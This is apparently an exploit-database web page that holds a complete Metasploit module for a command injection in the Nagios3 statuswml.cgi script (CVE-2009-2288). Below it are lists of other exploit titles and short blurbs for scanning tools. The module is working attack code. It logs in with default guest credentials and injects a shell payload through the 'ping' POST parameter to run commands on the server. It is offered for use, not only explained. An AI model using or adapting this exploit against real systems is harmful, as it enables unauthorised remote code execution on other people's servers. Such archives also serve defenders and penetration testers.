Menu

Search for hundreds of thousands of exploits

"Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)"

Author

Exploit author

"H D Moore"

Platform

Exploit platform

unix

Release date

Exploit published date

2009-10-30

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Nagios3 statuswml.cgi Ping Command Execution',
			'Description'    => %q{
				This module abuses a metacharacter injection vulnerability in the
			Nagios3 statuswml.cgi script. This flaw is triggered when shell
			metacharacters are present in the parameters to the ping and
			traceroute commands.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2009-2288' ],
					[ 'OSVDB', '55281'],
				],
			'Platform'       => ['unix'],
			'Arch'           => ARCH_CMD,				
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'BadChars'    => '<>',
					'Compat'      =>
						{
							'RequiredCmd' => 'generic perl ruby bash telnet',
						}
				},
			'Targets'        => 
				[
					[ 'Automatic Target', { }]
				],
			'DefaultTarget' => 0))
			
			register_options(
				[
					OptString.new('URI',  [true, "The full URI path to statuswml.cgi", "/nagios3/cgi-bin/statuswml.cgi"]),
					OptString.new('USER', [true, "The username to authenticate with", "guest"]),
					OptString.new('PASS', [true, "The password to authenticate with", "guest"]),								
				], self.class)
	end
	
	def exploit

		print_status("Sending request to http://#{rhost}:#{rport}#{datastore['URI']}")
		
		res = send_request_cgi({
			'method'    => 'POST',
			'uri'       => datastore['URI'],	
			'headers'   => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
			'vars_post' => 
			{
				'ping' => ';' + payload.encoded + '&'
			}
		}, 10)
		
		
		if(not res)
			if session_created?
				print_status("Session created, enjoy!")
			else
				print_error("No response from the server")
			end
			return
		end
		
		if(res.code == 401)
			print_error("Please specify correct values for USER and PASS")
			return
		end
		
		if(res.code == 404)
			print_error("Please specify the correct path to statuswml.cgi in the URI parameter")
			return
		end
		
		if(res.body =~ /Invalid host name/)
			print_error("This server has already been patched")
			return
		end
		
		if(res.body =~ /p mode='nowrap'>(.*)<\/p>/smi)
			print_status("Displaying command response")
			out = $1
			print_line(out.gsub(/<b>|<\/b>|<br.>/, ''))
			return
		end

		
		print_status("Unknown response, displaying raw HTML")
		print_line(res.body)
	end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2019-11-20 "Xorg X11 Server - Local Privilege Escalation (Metasploit)" local unix Metasploit
2019-09-03 "Cisco UCS Director - default scpuser password (Metasploit)" remote unix Metasploit
2019-07-29 "Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)" remote unix Metasploit
2019-07-07 "Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)" remote unix "Brian Peters"
2018-12-04 "Emacs - movemail Privilege Escalation (Metasploit)" local unix Metasploit
2018-11-06 "Morris Worm - sendmail Debug Mode Shell Escape (Metasploit)" remote unix Metasploit
2018-08-27 "HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)" remote unix Metasploit
2018-07-11 "IBM QRadar SIEM - Remote Code Execution (Metasploit)" remote unix Metasploit
2018-06-27 "Quest KACE Systems Management - Command Injection (Metasploit)" remote unix Metasploit
2018-05-08 "Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)" remote unix Metasploit
Release Date Title Type Platform Author
2009-11-12 "Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)" dos windows "H D Moore"
2009-10-30 "Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)" webapps unix "H D Moore"
2009-07-20 "DD-WRT HTTP v24-SP1 - Command Injection" remote linux "H D Moore"
2007-04-23 "Apple QuickTime for Java 7 - Memory Access (Metasploit)" remote multiple "H D Moore"
2006-11-13 "D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)" remote windows "H D Moore"
2006-11-13 "Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)" remote windows "H D Moore"
2006-11-01 "Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)" dos hardware "H D Moore"
2006-09-27 "Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)" remote windows "H D Moore"
2006-08-10 "Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)" remote windows "H D Moore"
2006-08-10 "Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)" remote windows "H D Moore"
2006-07-28 "Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution" remote multiple "H D Moore"
2006-07-25 "Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)" remote multiple "H D Moore"
2006-07-14 "Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)" remote multiple "H D Moore"
2006-07-07 "Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow" dos windows "H D Moore"
2006-06-22 "Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)" remote windows "H D Moore"
2006-05-15 "RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)" remote multiple "H D Moore"
2006-04-15 "Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)" remote novell "H D Moore"
2006-03-30 "PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2006-03-20 "X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation" local linux "H D Moore"
2006-03-01 "Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)" remote osx "H D Moore"
2006-02-28 "Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote (Metasploit)" remote windows "H D Moore"
2006-02-22 "Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-17 "Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)" remote windows "H D Moore"
2006-02-08 "Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-07 "Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)" remote linux "H D Moore"
2006-01-31 "Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2005-12-27 "Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)" remote windows "H D Moore"
2005-12-09 "Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)" remote windows "H D Moore"
2005-11-20 "Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)" remote hardware "H D Moore"
2005-10-19 "CA Unicenter 3.1 - CAM 'log_security()' Remote Stack Overflow (Metasploit)" remote windows "H D Moore" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected